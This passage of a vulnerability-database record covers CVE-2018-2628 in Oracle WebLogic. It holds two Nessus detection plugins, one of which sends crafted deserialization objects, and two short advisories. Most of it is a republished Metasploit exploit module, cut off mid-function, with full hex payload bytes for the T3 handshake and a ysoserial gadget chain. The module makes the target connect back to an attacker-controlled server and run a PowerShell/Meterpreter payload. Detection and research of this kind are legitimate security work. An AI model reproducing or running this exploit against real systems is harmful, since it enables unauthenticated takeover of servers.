\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x56\\x65\\x63\\x74\\x6f\\x72\\xd9\\x97\\x7d\\x5b\\x80\\x3b\\xaf\\x01\\x03\\x00\\x03\\x49\\x00\\x11\\x63\\x61\\x70\\x61\\x63\\x69\\x74\\x79\\x49\\x6e\\x63\\x72\\x65\\x6d\\x65\\x6e\\x74\\x49\\x00\\x0c\\x65\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x43\\x6f\\x75\\x6e\\x74\\x5b\\x00\\x0b\\x65\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x44\\x61\\x74\\x61\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00';\n\n\n# Object to be de-serialized:\n# sun.rmi.server.UnicastRef object with localhost:0 TCP endpoint\nauth_request += \n'\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x19\\x73\\x75\\x6e\\x2e\\x72\\x6d\\x69\\x2e' +\n'\\x73\\x65\\x72\\x76\\x65\\x72\\x2e\\x55\\x6e\\x69\\x63\\x61\\x73\\x74\\x52\\x65' +\n'\\x66\\x72\\x9b\\xa1\\xf1\\x9d\\x8f\\x4e\\x02\\x0c\\x00\\x00\\x78\\x70\\x77\\x26' +\n'\\x00\\x09\\x6c\\x6f\\x63\\x61\\x6c\\x68\\x6f\\x73\\x74\\x00\\x00\\x00\\x00\\x00' +\n'\\x00\\x00\\x00\\x64\\x86\\x26\\x2b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' +\n'\\x00\\x00\\x00\\x00\\x00\\x00\\x78';\n\nauth_request += '\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x25\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x49\\x6d\\x6d\\x75\\x74\\x61\\x62\\x6c\\x65\\x53\\x65\\x72\\x76\\x69\\x63\\x65\\x43\\x6f\\x6e\\x74\\x65\\x78\\x74\\xdd\\xcb\\xa8\\x70\\x63\\x86\\xf0\\xba\\x0c\\x00\\x00\\x78\\x72\\x00\\x29\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6d\\x69\\x2e\\x70\\x72\\x6f\\x76\\x69\\x64\\x65\\x72\\x2e\\x42\\x61\\x73\\x69\\x63\\x53\\x65\\x72\\x76\\x69\\x63\\x65\\x43\\x6f\\x6e\\x74\\x65\\x78\\x74\\xe4\\x63\\x22\\x36\\xc5\\xd4\\xa7\\x1e\\x0c\\x00\\x00\\x78\\x70\\x77\\x02\\x06\\x00\\x73\\x72\\x00\\x26\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6d\\x69\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x4d\\x65\\x74\\x68\\x6f\\x64\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x6f\\x72\\x12\\x48\\x5a\\x82\\x8a\\xf7\\xf6\\x7b\\x0c\\x00\\x00\\x78\\x70\\x77\\x34\\x00\\x2e\\x61\\x75\\x74\\x68\\x65\\x6e\\x74\\x69\\x63\\x61\\x74\\x65\\x28\\x4c\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x73\\x65\\x63\\x75\\x72\\x69\\x74\\x79\\x2e\\x61\\x63\\x6c\\x2e\\x55\\x73\\x65\\x72\\x49\\x6e\\x66\\x6f\\x3b\\x29\\x00\\x00\\x00\\x1b\\x78\\x78\\xfe\\x00\\xff';\nsend_t3(sock:sock, data:auth_request);\nret = recv_t3(sock:sock);\nclose(sock);\n\nif (isnull(ret) || 'sun.rmi.server.UnicastRef cannot be cast to weblogic' >!< ret)\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname, version);\n}\n\nreport =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T04:58:06", "description": "The version of Oracle WebLogic Server installed on the remote host is\naffected by multiple vulnerabilities", "edition": 36, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-04-20T00:00:00", "title": "Oracle WebLogic Server Multiple Vulnerabilities (April 2018 CPU)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1768", "CVE-2017-5645", "CVE-2018-2628"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server", "cpe:/a:oracle:fusion_middleware"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_APR_2018.NASL", "href": "https://www.tenable.com/plugins/nessus/109201", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109201);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2013-1768\", \"CVE-2017-5645\", \"CVE-2018-2628\");\n script_bugtraq_id(60534, 97702);\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (April 2018 CPU)\");\n script_summary(english:\"Checks for the patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebLogic Server installed on the remote host is\naffected by multiple vulnerabilities\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4e39ef65\");\n # https://www.tenable.com/blog/critical-oracle-weblogic-server-flaw-still-not-patched\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9cf2dde7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2018 Oracle\nCritical Patch Update advisory.\n\nNote that the patch for CVE-2018-2628 is reportedly incomplete.\nRefer to Oracle for any additional patch instructions or\nmitigation options.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-2628\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Weblogic Server Deserialization RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"spad_log_func.inc\");\n\napp_name = \"Oracle WebLogic Server\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = NULL;\nfix_ver = NULL;\nspad_log(message:\"checking version [\" + version + \"]\");\nif (version =~ \"^10\\.3\\.6\\.0\")\n{\n fix_ver = \"10.3.6.0.180417\";\n fix = make_list('GFWX', 'B47X'); # Smart Patch Update ID, only 10.3.6.0 has a smart patch update id\n}\nelse if (version =~ \"^12\\.1\\.3\\.0\")\n{\n fix_ver = \"12.1.3.0.180417\";\n fix = make_list(\"27419391\", \"27919943\");\n}\nelse if (version =~ \"^12\\.2\\.1\\.2\")\n{\n fix_ver = \"12.2.1.2.180417\";\n fix = make_list(\"27338939\",\"27741413\");\n}\nelse if (version =~ \"^12\\.2\\.1\\.3\")\n{\n fix_ver = \"12.2.1.3.180417\";\n fix = make_list(\"27342434\", \"27912627\");\n}\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n\nspad_log(message:\"checking fix [\" + obj_rep(fix) + \"]\");\nPATCHED=FALSE;\n\n# Iterate over the list of patches and check the install for the patchID\nforeach id (fix)\n{\n spad_log(message:\"Checking fix id: [\" + id +\"]\");\n if (install[id])\n {\n PATCHED=TRUE;\n break;\n }\n}\n\nVULN=FALSE;\nif (ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n VULN=TRUE;\n\nif (PATCHED || !VULN)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n\nos = get_kb_item_or_exit(\"Host/OS\");\nif ('windows' >< tolower(os))\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n}\nelse port = 0;\n\nreport =\n '\\n Oracle Home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Fixes : ' + join(sep:\", \", fix);\n\nsecurity_report_v4(extra:report, severity:SECURITY_HOLE, port:port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2018-06-26T22:12:57", "description": "Oracle WebLogic Server has CVE-2018-2628 (CVSS Base Score: 9.8) \u2013 Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. The easily exploitable vulnerability allows an unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in the takeover of Oracle WebLogic Server.", "published": "2018-04-18T00:00:00", "type": "seebug", "title": "Weblogic\u53cd\u5e8f\u5217\u5316\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2018-2628)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2628"], "modified": "2018-04-18T00:00:00", "id": "SSV:97236", "href": "https://www.seebug.org/vuldb/ssvid-97236", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "myhack58": [{"lastseen": "2018-04-18T13:33:30", "bulletinFamily": "info", "cvelist": ["CVE-2018-2628"], "description": "Vulnerability/event summary \nBeijing Time 4 month 18 days morning, Oracle officially released 4 months a critical patch update CPU CriticalPatchUpdate,which contains a high risk of the Weblogic deserialization Vulnerability(CVE-2018-2628), by the vulnerability, the attacker may unauthorized remote code execution. The attacker only needs to send the carefully constructed T3 Protocol data, we can obtain the target server's permissions. An attacker can exploit the vulnerability Control component, the impact of data availability, confidentiality and integrity. \nThe level of risk \nSerious \nThe scope of the impact \nOracleWebLogicServer10. 3. 6. 0 \nOracleWebLogicServer12. 1. 3. 0 \nOracleWebLogicServer12. 2. 1. 2 \nOracleWebLogicServer12. 2. 1. 3 \nDisposal recommendations \nUpgrade Oracle201804 on patch \nReference \nhttp://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html \nhttp://toutiao.secjia.com/cve-2018-2628 \n\n", "edition": 1, "modified": "2018-04-18T00:00:00", "published": "2018-04-18T00:00:00", "id": "MYHACK58:62201890003", "href": "http://www.myhack58.com/Article/html/3/62/2018/90003.htm", "type": "myhack58", "title": "WebLogic WLS core components deserialization Vulnerability, CVE-2018-2628-a vulnerability warning-the black bar safety net", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-08-12T02:14:54", "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "published": "2018-08-11T00:00:00", "title": "Oracle Weblogic Server Deserialization Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2628"], "modified": "2018-08-11T00:00:00", "id": "1337DAY-ID-30868", "href": "https://0day.today/exploit/description/30868", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core/exploit/powershell'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Exploit::Remote::TcpServer\r\n include Msf::Exploit::Powershell\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Oracle Weblogic Server Deserialization RCE',\r\n 'Description' => %q{\r\n An unauthenticated attacker with network access to the Oracle Weblogic\r\n Server T3 interface can send a serialized object to the interface to\r\n execute code on vulnerable hosts.\r\n },\r\n 'Author' =>\r\n [\r\n 'brianwrf', # EDB PoC\r\n 'Jacob Robles' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2018-2628'],\r\n ['EDB', '44553']\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n [ 'Windows',\r\n {\r\n 'Platform' => ['win']\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' =>\r\n {\r\n 'RPORT' => 7001\r\n },\r\n 'DisclosureDate' => 'Apr 17 2018'))\r\n end\r\n\r\n def gen_resp\r\n pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)\r\n pwrshl.gsub!(\"%COMSPEC%\", \"cmd.exe\")\r\n tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join\r\n\r\n mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')\r\n mycmd << tmp_dat\r\n\r\n # Response data taken from JRMPListener generated data:\r\n # java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 'calc.exe'\r\n # Modified captured network traffic bytes. Patch in command to run\r\n @resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'\r\n @resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'\r\n @resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'\r\n @resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'\r\n @resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'\r\n @resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'\r\n @resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'\r\n @resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'\r\n @resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'\r\n @resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'\r\n @resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'\r\n @resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'\r\n @resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'\r\n @resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'\r\n @resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'\r\n @resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'\r\n @resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'\r\n @resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'\r\n @resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'\r\n @resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'\r\n @resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'\r\n @resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'\r\n @resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'\r\n @resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'\r\n @resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'\r\n @resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'\r\n @resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'\r\n @resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'\r\n @resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'\r\n @resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'\r\n @resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'\r\n @resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'\r\n @resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'\r\n @resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'\r\n @resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'\r\n @resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'\r\n @resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'\r\n @resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'\r\n @resp << '70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'\r\n @resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'\r\n @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'\r\n @resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'\r\n @resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'\r\n @resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'\r\n @resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'\r\n @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'\r\n @resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'\r\n @resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'\r\n @resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'\r\n @resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'\r\n @resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'\r\n @resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'\r\n @resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'\r\n @resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'\r\n @resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'\r\n @resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'\r\n @resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'\r\n @resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'\r\n @resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'\r\n @resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'\r\n @resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'\r\n @resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'\r\n @resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'\r\n @resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200'\r\n @resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'\r\n @resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'\r\n @resp << '673badd256e7e91d7b470200007078700000000174'\r\n\r\n @resp << mycmd\r\n\r\n @resp << '74'\r\n @resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'\r\n @resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'\r\n @resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'\r\n @resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'\r\n @resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'\r\n @resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'\r\n @resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100'\r\n @resp << '7e005a'\r\n end\r\n\r\n\r\n def on_client_connect(client)\r\n # Make sure to only sent one meterpreter payload to a host.\r\n # During testing the remote host called back up to 11 times\r\n # (or as long as the server was listening).\r\n vprint_status(\"Comparing host: #{client.peerhost}\")\r\n if @met_sent.include?(client.peerhost) then return end\r\n @met_sent << client.peerhost\r\n\r\n vprint_status(\"met_sent: #{@met_sent}\")\r\n\r\n # Response format determined by watching network traffic\r\n # generated by EDB PoC\r\n accept_conn = '4e00'\r\n raccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join\r\n accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0')\r\n accept_conn << raccept_conn\r\n accept_conn << '0000'\r\n accept_conn << client.peerport.to_s(16).rjust(4,'0')\r\n\r\n client.put([accept_conn].pack('H*'))\r\n client.put([@resp].pack('H*'))\r\n end\r\n\r\n def t3_handshake\r\n shake = '74332031322e322e310a41533a323535'\r\n shake << '0a484c3a31390a4d533a313030303030'\r\n shake << '30300a0a'\r\n\r\n sock.put([shake].pack('H*'))\r\n sleep(1)\r\n sock.get_once\r\n end\r\n\r\n def build_t3_request_object\r\n # data block is from EDB PoC\r\n data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'\r\n data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'\r\n data << '700000000a000000030000000000000006007070707070700000000a00000003'\r\n data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'\r\n data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'\r\n data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'\r\n data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'\r\n data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'\r\n data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'\r\n data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'\r\n data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'\r\n data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'\r\n data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'\r\n data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'\r\n data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'\r\n data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'\r\n data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'\r\n data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'\r\n data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'\r\n data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'\r\n data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'\r\n data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'\r\n data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'\r\n data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'\r\n data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'\r\n data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'\r\n data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'\r\n data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'\r\n data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'\r\n data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'\r\n data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'\r\n data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'\r\n data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'\r\n data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'\r\n data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'\r\n data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'\r\n data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'\r\n data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'\r\n data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'\r\n data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'\r\n data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'\r\n data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'\r\n data << '2d4147444d565155423154362e656883348cd6000000070000'\r\n\r\n data << rport.to_s(16).rjust(4, '0')\r\n\r\n data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'\r\n data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'\r\n data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'\r\n data << '863d1d0000000078'\r\n\r\n sock.put([data].pack('H*'))\r\n sleep(2)\r\n sock.get_once\r\n end\r\n\r\n def send_payload_objdata\r\n # JRMPClient2 payload generated from EDB PoC:\r\n # python exploit.py <rhost> <rport> ysoserial-0.0.6-SNAPSHOT-BETA-all.jar <lhost> <lport> JRMPClient2\r\n # Patch in srvhost and srvport\r\n payload = '056508000000010000001b0000005d0101007372017870737202787000000000'\r\n payload << '00000000757203787000000000787400087765626c6f67696375720478700000'\r\n payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'\r\n payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'\r\n payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'\r\n payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'\r\n payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'\r\n payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'\r\n payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'\r\n payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'\r\n payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'\r\n payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'\r\n payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'\r\n payload << '78707702000078fe010000'\r\n\r\n # Data\r\n payload << 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e'\r\n payload << '416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50'\r\n payload << '726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e67'\r\n payload << '2f7265666c6563742f496e766f636174696f6e48616e646c65723b7870737200'\r\n payload << '2d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76'\r\n payload << '6f636174696f6e48616e646c657200000000000000020200007872001c6a6176'\r\n payload << '612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c6133'\r\n payload << '1e030000787077'\r\n\r\n unicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join\r\n unicast_dat = '000a556e696361737452656600'\r\n unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0')\r\n unicast_dat << unicast_srvhost\r\n unicast_dat << '0000'\r\n unicast_dat << srvport.to_s(16).rjust(4,'0')\r\n unicast_dat << '000000004e18654b000000000000000000000000000000'\r\n unicast_dat << '78'\r\n\r\n payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0')\r\n payload << unicast_dat\r\n\r\n payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'\r\n payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'\r\n payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'\r\n payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'\r\n payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'\r\n payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'\r\n payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'\r\n payload << '6f3b290000001b7878fe00ff'\r\n\r\n data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')\r\n data << payload\r\n\r\n 